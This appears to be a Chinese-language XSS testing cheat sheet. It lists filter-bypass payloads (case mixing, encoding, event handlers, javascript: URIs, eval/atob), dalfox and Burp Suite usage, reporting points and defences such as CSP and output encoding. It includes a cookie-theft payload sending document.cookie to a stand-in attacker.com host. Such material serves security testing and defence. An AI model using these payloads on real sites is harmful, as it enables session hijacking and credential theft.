Xss Testing

绕过过滤

大小写绕过

<ScRiPt>alert('XSS')</ScRiPt>

编码绕过

%3Cscript%3Ealert('XSS')%3C/script%3E
<script>alert('XSS')</script>

事件处理器

<img src=x onerror=alert(String.fromCharCode(88,83,83))>
<div onmouseover=alert('XSS')>hover</div>
<input onfocus=alert('XSS') autofocus>

伪协议

<a href="javascript:alert('XSS')">click</a>
<iframe src="javascript:alert('XSS')">

高级绕过技术

使用String.fromCharCode

<script>alert(String.fromCharCode(88,83,83))</script>

使用eval和atob

<script>eval(atob('YWxlcnQoJ1hTUycp'))</script>

使用HTML实体

<script>alert('XSS')</script>

工具使用

dalfox

# 基础扫描
dalfox url "http://target.com/page?q=test"

# 指定参数
dalfox url "http://target.com/page" -d "q=test" -X POST

# 使用自定义payload
dalfox url "http://target.com/page?q=test" --custom-payload payloads.txt

Burp Suite

• 使用Intruder模块进行批量测试
• 使用Repeater手动测试
• 使用Scanner自动检测

浏览器控制台

• 测试DOM型XSS
• 检查JavaScript执行环境
• 调试payload

验证和利用

验证步骤

1. 确认payload被执行
2. 检查是否被过滤或编码
3. 测试不同上下文（HTML、JavaScript、属性等）
4. 评估影响（Cookie窃取、会话劫持等）

利用场景

• Cookie窃取：<script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>
• 键盘记录：注入键盘事件监听器
• 钓鱼攻击：伪造登录表单
• 会话劫持：获取用户会话token

报告要点

• XSS类型（反射/存储/DOM）
• 触发位置和参数
• 完整的POC
• 影响评估
• 修复建议（输出编码、CSP策略等）

防护措施

• 输入验证和过滤
• 输出编码（HTML、JavaScript、URL）
• Content Security Policy (CSP)
• HttpOnly Cookie标志
• 使用安全的框架和库